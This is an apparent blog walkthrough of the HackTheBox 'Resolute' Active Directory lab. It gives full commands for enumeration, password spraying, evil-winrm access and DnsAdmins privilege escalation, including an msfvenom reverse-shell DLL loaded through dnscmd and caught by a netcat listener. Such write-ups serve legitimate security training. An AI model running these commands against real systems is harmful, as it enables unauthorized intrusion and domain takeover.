Resolute HackTheBox Walkthrough | Active Directory

Hey, fellow Hackers! Today, we’re going to dive into the Resolute HackTheBox Active Directory Machine. Let’s start scanning without wasting time :)

Scanning

Let’s start scanning target ip using nmap fast scan

nmap -F -sV 10.10.10.169

We got bunch of open ports and Domain: megabank.local

Let’s start enumerating them one by one

Enumeration & Gaining Shell

I started enumeration with domain port but found nothing then i tried listing smb shares using smbmap but no luck either

Then i run enum4linux and side wise started enumerating users with ldapsearch

enum4linux 10.10.10.169

ldapsearch -x -H ldap://10.10.10.169 -D 'CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL' -b 'DC=MEGABANK,DC=LOCAL' | grep userPrincipalName | sed 's/userPrincipalName: //'

In ldapsearch result i found list of users that i stored inside a file named as user.txt and in enum4linux output i find something more interesting with users

password with marko account

I tried verifying this password for marko user but it didn’t work :(

Then i start password spraying on all users with this password using crackmapexec

crackmapexec smb 10.10.10.169 -u user.txt -p 'Welcome123!'

and found melanie user can use this password :)

Using evil-winrm i got melanie user shell

Gaining Ryan User Shell

after shell i try enumerating directories and searching for files but found nothing interesting then i tried finding hidden directories and changed my location to C:\ directory using command Get-ChildItem -Force

Here i found a directory name PSTranscripts and inside his sub directory i find a file named as PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Reading it’s content give us ryan user password :)

Then using evil-winrm i gain ryan user shell

Ryan User to System32 :)

While enumerating ryan user i found out a group named as DnsAdmins

after searching about this i got bunch of blogs that show way for privilege escalation. Using this blog method i escalate my privilege to system32.

After reading blog we know that the member of the DnsAdmins group can run the DLL file with elevated privileges.

Steps i did for PrivEsc:

• Crafting a malicious dll using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll > shell.dll

• Using smbserver impacket script hosting the dll file

impacket-smbserver -smb2support d .

• Starting netcat listner on port 4444

nc -nvlp 4444

• Using dnscmd.exe executable i pass the DLL code into the memory as SYSTEM

dnscmd.exe /config /serverlevelplugindll \\10.10.14.34\d\shell.dll

• Restarting DNS Service to make the dll injected inside memory

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1328
        FLAGS              :

As soon as the service was restarted, a new connection was made on the netcat listener.

And as usual we found root.txt inside Administrator\Desktop

BOOMM!! Resolute Solved Successfully :)

Follow For More: Instagram, LinkedIn